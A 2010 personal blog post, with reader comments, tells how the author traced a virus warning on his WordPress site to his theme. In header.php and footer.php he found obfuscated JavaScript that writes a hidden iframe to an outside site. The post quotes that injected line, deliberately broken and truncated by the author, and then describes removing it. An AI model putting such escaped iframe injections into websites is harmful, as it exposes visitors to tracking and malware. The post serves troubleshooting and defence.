My Theme was Hacked here at LearnThis.ca!
Personal March 25th, 2010So, I had some urgent work to do on the site tonight and wanted to share my results. First off, I want to thank Robin at NakedinEden.com as well as Dena at EvolutionYou.net for pointing out that my site was being reported to have a virus or unsafe site reference on it over the last couple of days. I didn’t believe this at first because I just couldn’t find anything about this or confirm it. Anyway, I thought I would share a bit of what I went through to narrow this down and finally find it (and it seems to have fixed it). It’s amazing to me how sneaky some of these hacks can be and even more so, how they get access in the first place. I’m a software designer and developer and so I generally know my way around computers, websites and do at least the basic steps to protect yourself, yet I am constantly amazed that that is not enough nowadays.
Confirm it
Anyway, some of the actions I took in searching for this were:
- Robin mentioned the specific text which was showing in your virus detection so I started hunting for that. “seeintraf.com/click/in.cgi?3”
- I did a full database scan for all URLs and Author Names in case it was lodged inside some comment from someone (I’ve had image links for gravatars before showing as malformed URLs like this before). After a full search, nothing.
- I loaded the site into every browser out there from multiple computers in multiple locations with multiple virus softwares and none of them showed any problems or detected anything at all.
- I then did a full site extract and download to RAW HTML using a website downloader that will download all the images, links, URLS and everything into RAW html. I searched that with full text search to find any of those URL I characters from the virus software. Nothing.
- I ran a number of online virus scanner that check the site for bad links and online viruses or threats at the site. Nothing. None of them found any problems.
- I did a google search of course for the text and there were only two web sites in a forum that even mentioned it, but provided no help in solving it. Still nothng.
- I checked out the errors and blocked content showing up in IE for each page by pressing the little eyeball icon in the lower statusbar. This finally showed the referenced URL above and listed it as a blocked site and a tracking URL. OK, finally confirmed it!
Seek it
A relief to see that I was not just going crazy though and finally could confirm what my helpful readers had pointed out. Next on to solving it. I had no idea where to start and just started playing and testing. Here is what it took to find it.
- Turned off plugins to see if any made a difference to the tracking cookie incase I had some bad plugin. Nope. No differences.
- Checked pages with and without the sidebar on to narrow down WHERE the URL could be loading from. No difference with or without it.
- Checked file access times and permissions of all my site files for wordpress, nothing had any recent edits.
- Checked log files to see if any activity that was likely NOT mine showed up in my website logs. Nothing.
- Checked for wordpress updates and of course searched all the wordpress forums for this type of error. Nothing.
- Finally, swapped the theme back to the wordpress default theme and voila, problem went away. So, this meant that the problem was in my theme files
A nice relief came at this stage to at least know where the problems was even if I hadn’t narrowed down on it completely. It was just a matter of time though. The easy part here though. Since I had already tested if plugins or sidebar made a difference and it didn’t, I knew the problem had to be in my headers, footers or main display pages. Surprisingly, I came across this in my header.php file right after the start of the body text.
<script language=JavaScript>document.write(unescape(‘%3c%69f’+’ra’+’m%65 %7 ….. 65ig%68%74=%31 border=0 framebor%64e%72=0 %73%72c=%27htt’+’p://pr%6ffil%65sgu%69de.c%6fm ….. hp%3f%73%69d=1%27%3e%3c/if%72am%65%3e’))</script>
Note: I’ve broken the sequence of escape codes so this can’t be reproduced by anyone. It appears that the hack puts the URL into escape codes so you can’t easily just search for the URL like I had already tried to find this reference. Sneaky, that is for sure.
Destroy it
So, I removed it and tested the site. It was still the same problem, but I did notice some other URLS removed from the blocked content list. So, I checked my footer.php file for my theme as well and there it was again, a similar chunk of unescaped codes being written into my browser html. Once I removed this as well, I refreshed the site and it no longer has any of the blocked URLs showing up so it seems to have fixed the problem. I’ll obviously keep an eye on this and make sure it doesn’t come back. Hackers have a tendency (since they are usually automated systems) to get in over and over under the vulnerability is actually solved. I’ll have to continue looking into what that might be, as I have no idea right now.
I changed all my account passwords on my site, searched through the rest of my theme files and put all my changes back on for plugins and other site content. I’ve made a full site backup and database backup now just to be safe and will watch the site closely for a few days to ensure nothing else happens. I’ve let my ISP know about the hack as they often trace down attacks, especially if they can detect it on other domains as well and catch whoever is doing it. I hope this articles helps someone someday with a similar problems, gives you ideas for troubleshooting your own site problems if you have any or at least reminds you to backup your own blog and ensure you keep your passwords and content under close watch. Again, I thank my readers for informing me of this issue and I hope the site here didn’t cause any other issues for anyone. It doesn’t sound like that virus is any threat to your PC directly, but I honestly don’t know what they could have been tracking?
Prev: Book Review: The Other 8 Hours
Next: Are You Great At Work?
March 26th, 2010 at 10:20 AM
Dear Mike, Darn!! I should have thought to tell you. This is the EXACT place my site was hacked. In my WP blog header. And it too was Java Script. Dang, I just can’t believe I didn’t think to tell you that. It was late last night and I was sooooooooo tired, like my post says, “brain dead”.
I’ve been so maxed out lately that it was a wonder I was able to even let you know…or find the malicious text still stored in my anti virus – I’d not done that before, but I thought it might help you. But I could have saved you ALL that time, if I’d only the energy left to think.
I guess part of it also was that I am SO new to understanding even a bit of the “hacking” thing that I thought, “Who am I to suggest anything. I’ll only throw him more off course. Mike knows waaaaaaaaay more about all this than I do.” BUT how odd that the ONE thing that I DID know was the ONE thing that was also YOUR problem. LOL!!! Well, I am just sorry I did not at least throw my thoughts out there. I’ve learned from you today; the next time I don’t underestimate even my one tiny piece of knowledge. It might just be the ONE tiny piece that someone else is missing and needs. LOL!!! 🙂 So I apologize. And I am so glad you got it sorted out.
I too did all the security measures you mention here and wanted to write a post about it, BUT I am NOT tech savvy and was worried I would give incomplete advice. You did a fantastic job here of explaining not only how to ferret out a problem but what to do about it. I am touched by your thoughtfulness, which is such a strong part of who you are. Bless you my friend. You are a treasure, and so caring. Thank you MUCH, Robin
.-= Robin Easton´s last blog ..Down to the Bone =-.
March 26th, 2010 at 10:22 AM
PS Loved the image at the top for this post!! Hahaha!!! 🙂 Although not a funny time to go through all this, the image is GREAT. Made me laugh out loud. I needed that. 🙂
.-= Robin Easton´s last blog ..Down to the Bone =-.
March 26th, 2010 at 1:21 PM
Well, thanks Robin and please don’t be hard on yourself about not connecting such a detail to this similar situation. I’d still have the problem if it were not for your help in the first place and we have all had similar ‘gaps’ that are only visible after the even occurs.
It’s cool to see how such small things can sometimes teach us such profound lessons though isn’t it. I believe we ALL have much more potential than we give ourselves credit for and its usually ourselves that limit us from sharing and communicating that potential. Anyway, thanks for the followup and I hope this is a lesson (now in multiple ways) to offer what you can in whatever you know as its usually the unforeseen that we have the most impact in.
April 1st, 2010 at 3:46 PM
There are a few wordpress plugins that can help like Antivirus for WordPress, they let you scan all of the files and suspecious code. Also they will email you if you get any suspucious files in the database. Also I recomend the database backup, just in case it gets real bad. glad you got it fixed.
Paul
April 1st, 2010 at 6:16 PM
Thanks for the tip Paul, I had no idea that plugins could help with this!
April 8th, 2010 at 5:23 AM
That’s just ridiculous! As if there aren’t real-life pirates off Somalia, then we also need to deal with this kind of nonsense in the internet world.
I’m glad you escaped relatively unscathed, and best of luck in figuring out exactly how this was perpetrated. Always update WordPress and plugins as soon as the latest updates are released.
May 20th, 2010 at 6:59 AM
Hey Mike! Guess what — it happened to me too! Ugh. What is wrong with these people. So sad. 🙁
I’ve been working for the past couple of weeks to get everything fixed up, major inconvenience. Hope you’ve got everything sorted out now. 🙂
Take care!
Dena
May 20th, 2010 at 8:03 PM
Dena, Yup I worked to clean it up QUICKLY and have had this occur once more since this first time but am now running the WP-antivirus plugin and so it monitors for this kind of thing so hopefully it won’t happen again, and if it does, I’ll at least know about it right away through that plugin. I hope I never find out. Good luck with protecting your own site, hope this tip helps you out as well.